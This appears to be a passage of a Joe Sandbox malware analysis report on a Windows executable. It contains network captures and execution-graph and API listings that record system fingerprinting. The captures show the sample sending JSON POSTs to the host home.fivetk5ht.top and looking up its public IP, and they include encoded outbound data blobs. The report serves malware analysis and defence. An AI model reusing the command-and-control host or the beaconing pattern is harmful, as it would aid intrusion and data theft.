                                                      Data Ascii: 88t02f8sv3snm\/wDkr\/n60ka\/c2Lscy58uTj\/ACaF+Zdm+P8A6ZeZ1\/Uf8eNae08vx\/4AH6\/fHrTLzWfg\/wCPtMsI\/OvLzQ3igjGfncXNs+PlDH7qnoDXnnxx\/aj+G\/xQ\/aa8Y\/GL4haN4Zl+D3wa\/wCClnw8\/aL8FeH\/AIa\/ApPAcH7bn7NureI7bQPGGhfGTwb4Y8DeB9G+IHxs+Dvh\/T77xN8NfHP7
                                                      Dec 20, 2024 16:20:13.458772898 CET | 27192 | OUT | Data Raw: 68 5a 34 31 35 68 34 64 2b 4a 4f 50 38 53 59 34 44 44 35 76 6d 4f 5a 59 66 69 4c 44 34 6e 43 34 6d 74 57 6f 77 35 75 49 71 64 53 47 49 71 77 71 55 4b 6c 44 45 55 36 6c 42 31 6e 4b 68 4f 6a 57 6f 31 71 55 34 77 6e 53 72 55 36 6b 49 79 58 79 66 72
                                                      Data Ascii: hZ415h4d+JOP8SY4DD5vmOZYfiLD4nC4mtWow5uIqdSGIqwqUKlDEU6lB1nKhOjWo1qU4wnSrU6kIyXyfr93b+Kf2WPgx8I\/BPxl\/YzHiH4K\/Df49eHfGHw+8U\/sxeNdQ+Nes+LtT\/ax+Mfxf8AB1z8C\/2gNU\/Yh1fUfCfgvxb4N8QeFdQg8P2Px3+ENlbS3+rab4n8N6NfXetRT0fjJqnwW8TaB\/wUW8a6drXwf+IV
                                                      Dec 20, 2024 16:20:13.578219891 CET | 7416 | OUT | Data Raw: 75 35 66 33 48 34 5c 2f 5c 2f 71 5c 2f 72 54 5c 2f 4a 78 49 6e 6e 4a 73 54 5c 2f 57 39 66 33 5c 2f 41 50 31 37 65 32 65 6e 38 71 66 35 65 33 59 6a 70 38 6e 6c 66 75 70 4a 50 39 52 42 31 5c 2f 6e 2b 74 42 30 46 62 61 37 4b 36 66 76 45 53 54 39 36
                                                      Data Ascii: u5f3H4\/\/q\/rT\/JxInnJsT\/W9f3\/AP17e2en8qf5e3Yjp8nlfupJP9RB1\/n+tB0Fba7K6fvEST96I7fv259f6+nrCwf+P5E\/1UQj9Ov4n\/Iq15PHyfc8ryvs+f8AR5un+f8A63FQfJ5fzvsf\/W9fP\/X0xx+HNBt7\/wDd\/Eh\/uO77H\/5ZY7+\/+c\/h3Z\/f2fP\/ALf\/AD261NJ+73pI\/wAkn\/PT\/lj\/
                                                      Dec 20, 2024 16:20:14.473885059 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.12 | 49712 | 185.121.15.192 | 80 | 7012 | C:\Users\user\Desktop\CMpuGis28l.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 20, 2024 16:20:15.325867891 CET | 284 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                      Host: home.fivetk5ht.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 143
                                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                      Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                      Dec 20, 2024 16:20:16.608032942 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.12 | 49710 | 98.85.100.80 | 443 | 7012 | C:\Users\user\Desktop\CMpuGis28l.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-20 15:20:11 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-20 15:20:11 UTC | 224 | IN | HTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 15:20:11 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-20 15:20:11 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}


                                                      Target ID: 0
                                                      Start time: 10:20:06
                                                      Start date: 20/12/2024
                                                      Path: C:\Users\user\Desktop\CMpuGis28l.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: "C:\Users\user\Desktop\CMpuGis28l.exe"
                                                      Imagebase: 0xf70000
                                                      File size: 4'480'512 bytes
                                                      MD5 hash: B6AA4B3886F2272B307DF8DEE7426A4F
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: C, C++ or other language
                                                      Reputation: low
                                                      Has exited: true


                                                        Execution Graph

                                                        Execution Coverage:4.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:22.3%
                                                        Total number of Nodes:215
                                                        Total number of Limit Nodes:30
                                                        execution_graph 25339 f731d7 25342 f731f4 25339->25342 25340 f73200 25341 f732dc CloseHandle 25341->25340 25342->25340 25342->25341 25343 f72f17 25350 f72f2c 25343->25350 25344 f731d3 25345 f72fb3 RegOpenKeyExA 25345->25350 25346 f7315c RegEnumKeyExA 25346->25350 25347 f73046 RegOpenKeyExA 25348 f73089 RegQueryValueExA 25347->25348 25347->25350 25349 f7313b RegCloseKey 25348->25349 25348->25350 25349->25350 25350->25344 25350->25345 25350->25346 25350->25347 25350->25349 25351 1024720 25352 1024728 25351->25352 25356 1024733 25352->25356 25357 1029270 25352->25357 25354 1024860 25360 1024950 25354->25360 25364 102a440 25357->25364 25359 1029297 25359->25354 25361 1024966 25360->25361 25362 10249c5 25361->25362 25363 1024aa0 gethostname 25361->25363 25362->25356 25363->25361 25363->25362 25365 102a46b 25364->25365 25366 102a48b GetAdaptersAddresses 25365->25366 25399 102a4db 25365->25399 25382 102a4a6 25366->25382 25398 102a53f 25366->25398 25367 102aa03 RegOpenKeyExA 25368 102ab70 RegOpenKeyExA 25367->25368 25369 102aa27 RegQueryValueExA 25367->25369 25370 102ac34 RegOpenKeyExA 25368->25370 25396 102ab90 25368->25396 25371 102aa71 25369->25371 25372 102aacc RegQueryValueExA 25369->25372 25373 102acf8 RegOpenKeyExA 25370->25373 25395 102ac54 25370->25395 25371->25372 25378 102aa85 RegQueryValueExA 25371->25378 25374 102ab66 RegCloseKey 25372->25374 25375 102ab0e 25372->25375 25376 102ad56 RegEnumKeyExA 25373->25376 25384 102ad14 25373->25384 25374->25368 25375->25374 25383 102ab1e RegQueryValueExA 25375->25383 25379 102ad9b 25376->25379 25376->25384 25377 102a4f3 GetAdaptersAddresses 25380 102a505 25377->25380 25377->25398 25381 102aab3 25378->25381 25385 102ae16 RegOpenKeyExA 25379->25385 25389 102a527 GetAdaptersAddresses 25380->25389 25380->25399 25381->25372 25382->25377 25382->25399 25388 102ab4c 25383->25388 25384->25359 25386 102ae34 RegQueryValueExA 25385->25386 25387 102addf RegEnumKeyExA 25385->25387 
25390 102af43 RegQueryValueExA 25386->25390 25400 102adaa 25386->25400 25387->25384 25387->25385 25388->25374 25389->25398 25389->25399 25391 102b052 RegQueryValueExA 25390->25391 25390->25400 25392 102adc7 RegCloseKey 25391->25392 25391->25400 25392->25387 25393 102a794 GetBestRoute2 25393->25398 25394 102afa0 RegQueryValueExA 25394->25400 25395->25373 25396->25370 25397 102a6c7 GetBestRoute2 25397->25398 25398->25393 25398->25397 25398->25399 25399->25367 25399->25384 25400->25390 25400->25391 25400->25392 25400->25394 25272 103a080 25275 1039740 25272->25275 25274 103a09b 25276 1039780 25275->25276 25280 103975d 25275->25280 25277 1039925 RegOpenKeyExA 25276->25277 25276->25280 25278 103995a RegQueryValueExA 25277->25278 25277->25280 25279 1039986 RegCloseKey 25278->25279 25279->25280 25280->25274 25281 103b180 25284 103b19b 25281->25284 25288 103b2e3 25281->25288 25285 103b2a9 getsockname 25284->25285 25287 103b020 closesocket 25284->25287 25284->25288 25289 103af30 25284->25289 25293 103b060 25284->25293 25298 103b020 25285->25298 25287->25284 25290 103af63 socket 25289->25290 25291 103af4c 25289->25291 25290->25284 25291->25290 25292 103af52 25291->25292 25292->25284 25296 103b080 25293->25296 25294 103b0b0 connect 25295 103b0bf WSAGetLastError 25294->25295 25295->25296 25297 103b0ea 25295->25297 25296->25294 25296->25295 25296->25297 25297->25284 25299 103b052 25298->25299 25300 103b029 25298->25300 25299->25284 25301 103b04b closesocket 25300->25301 25302 103b03e 25300->25302 25301->25299 25302->25284 25303 103a8c0 25304 103a903 recvfrom 25303->25304 25305 103a8e6 25303->25305 25306 103a8ed 25304->25306 25305->25304 25305->25306 25401 103a920 25403 103a944 25401->25403 25402 103a94b 25403->25402 25404 103a977 send 25403->25404 25307 f729ff FindFirstFileA 25308 f72a31 25307->25308 25309 f72a5c RegOpenKeyExA 25308->25309 25310 f72a93 25309->25310 25311 f72ade CharUpperA 25310->25311 25312 f72b0a 25311->25312 25313 f72bf9 QueryFullProcessImageNameA 
25312->25313 25314 f72c3b CloseHandle 25313->25314 25315 f72c64 25314->25315 25316 f72df1 CloseHandle 25315->25316 25317 f72e23 25316->25317 25405 f73d5e 25408 f73d30 25405->25408 25407 f73d90 25408->25405 25408->25407 25409 f80ab0 25408->25409 25412 f805b0 25409->25412 25411 f80acd 25411->25408 25413 f805bd 25412->25413 25416 f807c7 25412->25416 25414 f80707 WSAEventSelect 25413->25414 25415 f807ef 25413->25415 25413->25416 25426 f776a0 25413->25426 25414->25413 25414->25416 25415->25416 25421 f80847 25415->25421 25422 f86fa0 25415->25422 25416->25411 25419 f809e8 WSAEnumNetworkEvents 25420 f809d0 WSAEventSelect 25419->25420 25419->25421 25420->25419 25420->25421 25421->25416 25421->25419 25421->25420 25423 f86feb 25422->25423 25425 f86fd4 25422->25425 25423->25421 25424 f87207 select 25424->25423 25425->25423 25425->25424 25427 f776e6 send 25426->25427 25428 f776c0 25426->25428 25429 f776c9 25427->25429 25428->25427 25428->25429 25429->25413 25318 fa95b0 25319 fa95c8 25318->25319 25320 fa95fd 25318->25320 25319->25320 25322 faa150 25319->25322 25323 faa15f 25322->25323 25325 faa1d0 25322->25325 25324 faa181 getsockname 25323->25324 25323->25325 25324->25325 25325->25320 25430 fa8b50 25431 fa8b6b 25430->25431 25445 fa8bb5 25430->25445 25431->25445 25446 fa8b8f 25431->25446 25447 faa550 25431->25447 25433 fa8bfc 25435 fa8c1f connect 25433->25435 25436 fa8c35 25433->25436 25443 fa8cb2 25433->25443 25433->25445 25434 fa8cd9 SleepEx 25440 fa8d13 25434->25440 25435->25436 25439 faa150 getsockname 25436->25439 25437 faa150 getsockname 25442 fa8dff 25437->25442 25439->25446 25441 fa8d43 25440->25441 25440->25443 25444 faa150 getsockname 25441->25444 25442->25445 25460 f778b0 closesocket 25442->25460 25443->25437 25443->25442 25443->25445 25444->25445 25446->25434 25446->25443 25446->25445 25448 faa575 25447->25448 25450 faa597 25448->25450 25462 f775e0 25448->25462 25453 faa811 setsockopt 25450->25453 25458 faa83b 25450->25458 25459 faa69b 25450->25459 25451 f778b0 
closesocket 25452 faa713 25451->25452 25452->25433 25453->25458 25455 faaf56 25456 faaf5d 25455->25456 25455->25459 25456->25452 25457 faa150 getsockname 25456->25457 25457->25452 25458->25459 25467 fd67e0 ioctlsocket 25458->25467 25459->25451 25459->25452 25461 f778c5 25460->25461 25461->25445 25463 f77607 socket 25462->25463 25464 f775ef 25462->25464 25465 f7762b 25463->25465 25464->25463 25466 f77643 25464->25466 25465->25450 25466->25450 25467->25455 25468 f7255d 25469 12f9f70 25468->25469 25470 f7256c GetSystemInfo 25469->25470 25471 f72589 25470->25471 25472 f725a0 GlobalMemoryStatusEx 25471->25472 25479 f725ec 25472->25479 25473 f7263c GetDriveTypeA 25475 f72655 GetDiskFreeSpaceExA 25473->25475 25473->25479 25474 f72762 25476 f727d6 KiUserCallbackDispatcher 25474->25476 25475->25479 25477 f727f8 25476->25477 25478 f72842 SHGetKnownFolderPath 25477->25478 25480 f728c3 25478->25480 25479->25473 25479->25474 25481 f728d9 FindFirstFileW 25480->25481 25482 f72906 FindNextFileW 25481->25482 25483 f72928 25481->25483 25482->25482 25482->25483 25326 f8d5e0 25327 f8d652 WSAStartup 25326->25327 25328 f8d5f0 25326->25328 25327->25328 25329 f720ad 25330 f720d9 25329->25330 25331 f720e3 25330->25331 25333 12fb160 Sleep 25330->25333 25333->25330 25484 fab3c0 25485 fab3cb 25484->25485 25486 fab3ee 25484->25486 25488 f776a0 send 25485->25488 25490 fa9290 25485->25490 25487 fab3ea 25488->25487 25491 f776a0 send 25490->25491 25492 fa92e5 25491->25492 25493 fa9335 WSAIoctl 25492->25493 25495 fa9392 25492->25495 25494 fa9366 25493->25494 25493->25495 25494->25495 25496 fa9371 setsockopt 25494->25496 25495->25487 25496->25495 25497 fab400 25498 fab40b 25497->25498 25499 fab425 25497->25499 25502 f77770 25498->25502 25500 fab421 25503 f777b6 recv 25502->25503 25504 f77790 25502->25504 25505 f77799 25503->25505 25504->25503 25504->25505 25505->25500 25334 12fd1b0 25337 12fd1cd 25334->25337 25335 12fd4e4 localeconv 25335->25337 25336 12fc9a0 localeconv 25336->25337 25337->25335 
25337->25336 25338 12fd38e 25337->25338
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                        • API String ID: 0-1590685507
                                                        • Opcode ID: 69e8d8c9b225b38a332464ad0fc6385de1c19879421a87cccdc577fcd1b8b004
                                                        • Instruction ID: 22995a400968bd61dd772dfb0e2cab0a69056c2ce3106bbf13a8b34192351952
                                                        • Opcode Fuzzy Hash: 69e8d8c9b225b38a332464ad0fc6385de1c19879421a87cccdc577fcd1b8b004
                                                        • Instruction Fuzzy Hash: D7C2B171A043449FD724DF69C484B6AB7E1BF89324F04866DEC989F262D770ED88DB81

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE ref: 00F72579
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 00F725CC
                                                        • GetDriveTypeA.KERNELBASE ref: 00F72647
                                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 00F7267E
                                                        • KiUserCallbackDispatcher.NTDLL ref: 00F727E2
                                                        • SHGetKnownFolderPath.SHELL32 ref: 00F7286D
                                                        • FindFirstFileW.KERNELBASE ref: 00F728F8
                                                        • FindNextFileW.KERNELBASE ref: 00F7291F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                        • String ID: @$`
                                                        • API String ID: 2066228396-3318628307
                                                        • Opcode ID: 07e65a6b3d3fdcb97aa2c5344d416aac929faeeaf6131713ead66f42049f1108
                                                        • Instruction ID: a7f4f6f6af3a696efdbc1fb6f4eb6d31dbd9d7b728128a36f5b123e3123c0c46
                                                        • Opcode Fuzzy Hash: 07e65a6b3d3fdcb97aa2c5344d416aac929faeeaf6131713ead66f42049f1108
                                                        • Instruction Fuzzy Hash: C2D1B3B4904309DFCB50EFA8D99469EBBF0BF48354F01896EE99897344E7359A84CF42

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1260 f729ff-f72a2f FindFirstFileA 1261 f72a31-f72a36 1260->1261 1262 f72a38 1260->1262 1263 f72a3d-f72a91 call 13f1150 call 13f11e0 RegOpenKeyExA 1261->1263 1262->1263 1268 f72a93-f72a98 1263->1268 1269 f72a9a 1263->1269 1270 f72a9f-f72b0c call 13f1150 call 13f11e0 CharUpperA call 12f8da0 1268->1270 1269->1270 1278 f72b15 1270->1278 1279 f72b0e-f72b13 1270->1279 1280 f72b1a-f72b92 call 13f1150 call 13f11e0 call 12f8e80 call 12f8e70 1278->1280 1279->1280 1289 f72b94-f72ba3 1280->1289 1290 f72bcc-f72c66 QueryFullProcessImageNameA CloseHandle call 12f8da0 1280->1290 1293 f72ba5-f72bae 1289->1293 1294 f72bb0-f72bca call 12f8e68 1289->1294 1300 f72c6f 1290->1300 1301 f72c68-f72c6d 1290->1301 1293->1290 1294->1289 1294->1290 1302 f72c74-f72ce9 call 13f1150 call 13f11e0 call 12f8e80 call 12f8e70 1300->1302 1301->1302 1311 f72dcf-f72e1c call 13f1150 call 13f11e0 CloseHandle 1302->1311 1312 f72cef-f72d49 call 12f8bb0 call 12f8da0 1302->1312 1322 f72e23-f72e2e 1311->1322 1325 f72d4b-f72d63 call 12f8da0 1312->1325 1326 f72d99-f72dad 1312->1326 1323 f72e37 1322->1323 1324 f72e30-f72e35 1322->1324 1327 f72e3c-f72ed6 call 13f1150 call 13f11e0 1323->1327 1324->1327 1325->1326 1333 f72d65-f72d7d call 12f8da0 1325->1333 1326->1311 1342 f72eea 1327->1342 1343 f72ed8-f72ee1 1327->1343 1333->1326 1338 f72d7f-f72d97 call 12f8da0 1333->1338 1338->1326 1344 f72daf-f72dc9 call 12f8e68 1338->1344 1346 f72eef-f72f16 call 13f1150 call 13f11e0 1342->1346 1343->1342 1345 f72ee3-f72ee8 1343->1345 1344->1311 1344->1312 1345->1346
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                        • String ID: 0
                                                        • API String ID: 2406880114-4108050209
                                                        • Opcode ID: 81af068bda3e9e998d8f37ef2e6546f9716e49dd266e72e15859156c95b39e11
                                                        • Instruction ID: e86e95df48833d366bf16120991f6aebe29ed25be7a7b2407c598128344a717e
                                                        • Opcode Fuzzy Hash: 81af068bda3e9e998d8f37ef2e6546f9716e49dd266e72e15859156c95b39e11
                                                        • Instruction Fuzzy Hash: 2DE1C2B0905306DFCB50EF68D99469DBBF4BF44348F01886AE998DB344E7399A849F42

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1650 f805b0-f805b7 1651 f805bd-f805d4 1650->1651 1652 f807ee 1650->1652 1653 f805da-f805e6 1651->1653 1654 f807e7-f807ed 1651->1654 1653->1654 1655 f805ec-f805f0 1653->1655 1654->1652 1656 f805f6-f80620 call f87350 call f770b0 1655->1656 1657 f807c7-f807cc 1655->1657 1662 f8066a-f8068c call fadec0 1656->1662 1663 f80622-f80624 1656->1663 1657->1654 1668 f80692-f806a0 1662->1668 1669 f807d6-f807e3 call f87380 1662->1669 1664 f80630-f80655 call f770d0 call f803c0 call f87450 1663->1664 1694 f8065b-f80668 call f770e0 1664->1694 1695 f807ce 1664->1695 1671 f806a2-f806a4 1668->1671 1672 f806f4-f806f6 1668->1672 1669->1654 1675 f806b0-f806e4 call f873b0 1671->1675 1677 f806fc-f806fe 1672->1677 1678 f807ef-f8082b call f83000 1672->1678 1675->1669 1693 f806ea-f806ee 1675->1693 1683 f8072c-f80754 1677->1683 1691 f80a2f-f80a35 1678->1691 1692 f80831-f80837 1678->1692 1687 f8075f-f8078b 1683->1687 1688 f80756-f8075b 1683->1688 1706 f80700-f80703 1687->1706 1707 f80791-f80796 1687->1707 1689 f8075d 1688->1689 1690 f80707-f80719 WSAEventSelect 1688->1690 1696 f80723-f80726 1689->1696 1690->1669 1703 f8071f 1690->1703 1701 f80a3c-f80a52 1691->1701 1702 f80a37-f80a3a 1691->1702 1697 f80839-f80842 call f86fa0 1692->1697 1698 f80861-f8087e 1692->1698 1693->1675 1700 f806f0 1693->1700 1694->1662 1694->1664 1695->1669 1696->1678 1696->1683 1710 f80847-f8084c 1697->1710 1717 f80882-f8088d 1698->1717 1700->1672 1701->1669 1708 f80a58-f80a81 call f82f10 1701->1708 1702->1701 1703->1696 1706->1690 1707->1706 1711 f8079c-f807c2 call f776a0 1707->1711 1708->1669 1723 f80a87-f80a97 call f86df0 1708->1723 1714 f80a9c-f80aa4 1710->1714 1715 f80852 1710->1715 1711->1706 1714->1669 1715->1698 1719 f80854-f8085f 1715->1719 1721 f80970-f80975 1717->1721 1722 f80893-f808b1 1717->1722 1719->1717 1725 f80a19-f80a2c 1721->1725 1726 f8097b-f80989 call f770b0 1721->1726 1727 f808c8-f808f7 1722->1727 1723->1669 1725->1691 1726->1725 1735 f8098f-f8099e 1726->1735 1733 f808f9-f808fb 1727->1733 1734 f808fd-f80925 1727->1734 1736 f80928-f8093f 1733->1736 1734->1736 1737 f809b0-f809c1 call f770d0 1735->1737 1743 f808b3-f808c2 1736->1743 1744 f80945-f8096b 1736->1744 1741 f809a0-f809ae call f770e0 1737->1741 1742 f809c3-f809c7 1737->1742 1741->1725 1741->1737 1745 f809e8-f80a03 WSAEnumNetworkEvents 1742->1745 1743->1721 1743->1727 1744->1743 1747 f809d0-f809e6 WSAEventSelect 1745->1747 1748 f80a05-f80a17 1745->1748 1747->1741 1747->1745 1748->1747
                                                        APIs
                                                        • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00F80712
                                                        • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00F809DC
                                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00F809FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
